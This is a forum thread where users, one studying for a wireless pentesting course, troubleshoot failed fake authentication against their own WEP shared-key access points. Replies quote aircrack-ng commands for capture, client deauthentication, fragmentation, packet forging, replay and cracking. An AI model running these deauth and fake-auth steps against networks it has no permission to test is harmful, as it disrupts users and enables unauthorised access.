Results 1 to 9 of 9

Thread: Aircrack-ng: Fakeauth against WEP-SKA w/ PRGA .xor

Hybrid View

  1. #1
    Member
    Join Date
    Jun 2009
    Posts
    74

    Default Aircrack-ng: Fakeauth against WEP-SKA w/ PRGA .xor

    Hello,

    I have what I think is a simple question. I am in the middle of taking the OSWP course and have a question about authenticating against a WEP-encrypted network with SKA enabled. For reference:

    $ap = my AP's MAC
    $alfa = my MAC
    $pc = another laptop I have connected to my AP's MAC

    My goal is to fakeauth with my alfa card to my AP by using a PRGA .xor generated via a fragmentation attack. Yes I know there are other ways I can inject (e.g. spoof my other client's MAC as my own after deauthing the other client, etc and fakeauth as that source mac). I don't want to do that because in a real life scenario (i.e. a pentest) it could be noticed and a good attacker probably would try to avoid it. Anyway - that aside, I must be missing something stupid here:

    First I monitor my AP via airpdump-ng with:

    Code:
    airodump-ng -c 6 --bssid $ap -w wepviaclient wlan0
    And see the output w/ no problem, my PC connected to it, etc. (I'm posting this from a different computer so I can't copy and paste the output right now and I don't think it's necessary for this cause I know it's correct).

    Then I fragment to generate the .xor file:

    Code:
    aireplay-ng -5 -b $ap -h $alfa -l 255.255.255.255 -k 255.255.255.255 wlan0
    A .xor is generated.

    Then I attempt to fakeauth:

    Code:
    aireplay-ng -1 0 -a $ap -h $alfa -y fragment-0629-233133.xor wlan0
    And I get:

    Code:
    Sending Authentication Request (Shared Key) [ACK]
    Authentication 1/2 successful
    Sending encrypted challenge [ACK]
    Challenge failure
    Over, and over, and over.

    The one thing I don't quite understand are the -l and -k switches when generating the .xor (I assume this is just so the AP will pass the packet through but some clarification there might be the key). Any ideas what I'm doing wrong? I feel like it's something very simple that I'm missing. In the mean time, turning off SKA or generating ARPs as an auth'd client works fine to increase IVs and I have already cracked the key several times. I don't know if this is really relevant to the course or not but I really want to know why this doesn't work.

    Thanks!
    Last edited by ThePistonDoctor; 06-30-2011 at 04:57 AM.
    cd ~
    cd ./fridge
    rm beer
    cd ../bedroom
    more beer

  2. #2
    Junior Member
    Join Date
    Jun 2011
    Location
    UK
    Posts
    45

    Default Re: Aircrack-ng: Fakeauth against WEP-SKA w/ PRGA .xor

    it looks like the AP MAC filter is enabled, your AP won't take your Alpha fake Mac, you need to change your fake Mac to the Mac usauly connect to the AP,

  3. #3
    Member
    Join Date
    Jun 2009
    Posts
    74

    Default Re: Aircrack-ng: Fakeauth against WEP-SKA w/ PRGA .xor

    No MAC filter - it's my AP and I know it's off. If I auth against it w/ open authentication it works fine. It's only when using SKA that I can't associate. I don't really see how the PRGA xor can be used to generate the key - or is it just being used to make it look like I already have the key and sent the association encrypted w/ a valid PRGA?

    Thanks
    cd ~
    cd ./fridge
    rm beer
    cd ../bedroom
    more beer

  4. #4
    Just burned his ISO
    Join Date
    Jul 2011
    Posts
    2

    Default Re: Aircrack-ng: Fakeauth against WEP-SKA w/ PRGA .xor

    Hello

    I have the same issue

    However i use another method to obtain the xor file

    first i start by monitoring the network with
    airodump-ng -w $FILE --bssid $BSSID -c $CHANNEL mon0

    I notice that it is a network with WEP and the AUTH field says SKA

    I deauth one client with:
    aireplay-ng -0 1 -a $BSSID -c $CLIENT mon0

    I see that i have a .xor file and i do

    aireplay-ng -1 0 -e $ESSID -y $FILE.xor -a $BSSID -h $MY_MAC mon0

    However the reply is:
    15:38:03 Sending Authentication Request (Shared Key) [ACK]
    15:38:03 Authentication 1/2 successful
    15:38:03 Sending encrypted challenge. [ACK]
    15:38:03 Challenge failure

  5. #5
    Just burned his ISO
    Join Date
    Dec 2010
    Posts
    23

    Default Re: Aircrack-ng: Fakeauth against WEP-SKA w/ PRGA .xor

    Hi,

    I may be missing the point - it's been a long week (!), but how about the following:

    Capture Output: airodump-ng -c 1 -w ska -bssid [bssid] mon0 (.xor via client connection, deauth, etc)
    Create Packet: packetforge-ng -0 -a [ bssid] -h [my client mac] -l 255.255.255.255 -k 255.255.255.255 -y captured.xor -w output.cap
    Fake Auth: aireplay-ng -1 10 -e [essid] –a [BSSID] -h [my client mac] -y output.cap mon0
    Natural Replay: aireplay-ng -2 -r output.cap
    Crack: aircrack-ng output.cap

  6. #6
    Just burned his ISO
    Join Date
    May 2011
    Posts
    3

    Default Re: Aircrack-ng: Fakeauth against WEP-SKA w/ PRGA .xor

    Quote Originally Posted by Quartercask View Post
    Capture Output: airodump-ng -c 1 -w ska -bssid [bssid] mon0 (.xor via client connection, deauth, etc)
    Create Packet: packetforge-ng -0 -a [ bssid] -h [my client mac] -l 255.255.255.255 -k 255.255.255.255 -y captured.xor -w output.cap
    Fake Auth: aireplay-ng -1 10 -e [essid] –a [BSSID] -h [my client mac] -y output.cap mon0
    Natural Replay: aireplay-ng -2 -r output.cap
    Crack: aircrack-ng output.cap
    Thanks for helping out Quartercask, I've been having the same problem as ThePistonDoctor and tried your solution. I just get a 108 byte file from packetforge which can't be used for the fakeauth.

    I can happily crack the AP (my home router) if I use open WEP or WPA2 (with the password in the wordlist of course), but as soon as I change to shared key WEP I get the same problem of "Authentication 1/2 successful...Challenge failure" repeated over and over again.

    I've tried changing my mac to that of the authorised client and I still get the same problem (with and without the client being active).

    I can't find a solution anywhere on the web (though the aircrack-ng forums are down atm) despite searching for a number of hours.

    Anyone find a solution for a total noob like me?

    Cheers,
    Demented

    P.S. AP is a TP-Link TL-WR1043N. Client is an old Dell Inspiron and penetration box is a Asus M51vm running BT5r2 with an intel WiFi Link 5100 (apt upgrade and dist-upgrade run this morning 3-June-12).

  7. #7
    Just burned his ISO darcstar's Avatar
    Join Date
    Jun 2011
    Location
    127.0.0.1
    Posts
    10

    Default Re: Aircrack-ng: Fakeauth against WEP-SKA w/ PRGA .xor

    Just create an entry in you MAC inclusion list on your router settings to include the faked MAC you want to use for the attack. If you use an Alfa card and then change it's MAC, it can no longer associate with ifconfig settings. If you do include the fake MAC into the inclusion list, you can continue to function on the same interface without the issue of inconsistency.
    I have generated a series of inclusions into my AP so I can have a choice depending on the situation, and this will still allow you to connect to your AP after you use macchanger.

  8. #8
    Just burned his ISO
    Join Date
    Jul 2011
    Posts
    1

    Default Riferimento: Re: Aircrack-ng: Fakeauth against WEP-SKA w/ PRGA .xor

    Quote Originally Posted by darcstar View Post
    Just create an entry in you MAC inclusion list on your router settings to include the faked MAC you want to use for the attack. If you use an Alfa card and then change it's MAC, it can no longer associate with ifconfig settings. If you do include the fake MAC into the inclusion list, you can continue to function on the same interface without the issue of inconsistency.
    I have generated a series of inclusions into my AP so I can have a choice depending on the situation, and this will still allow you to connect to your AP after you use macchanger.
    A key that is completely random (maximum entropy) without any pattern, using any andom alpha-numeric characters (a-z, A-Z, 0-9)...62 possible characters.
    WPA-PSK TKIP (RC4)
    I am curious how many centuries it would take!

Similar Threads

  1. My BT3 hang when fakeauth
    By imported_gavin in forum OLD Newbie Area
    Replies: 2
    Last Post: 05-22-2008, 01:09 PM
  2. Prob with Fakeauth
    By damnation in forum OLD Newbie Area
    Replies: 6
    Last Post: 01-23-2008, 03:01 AM
  3. fakeauth a belkin
    By scully69 in forum OLD Wireless
    Replies: 2
    Last Post: 12-01-2007, 05:40 AM
  4. FakeAuth
    By merlin051 in forum OLD Newbie Area
    Replies: 4
    Last Post: 12-01-2007, 04:13 AM
  5. Changing MAC for Fakeauth
    By buggs187 in forum OLD BackTrack v2.0 Final
    Replies: 2
    Last Post: 03-11-2007, 08:00 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •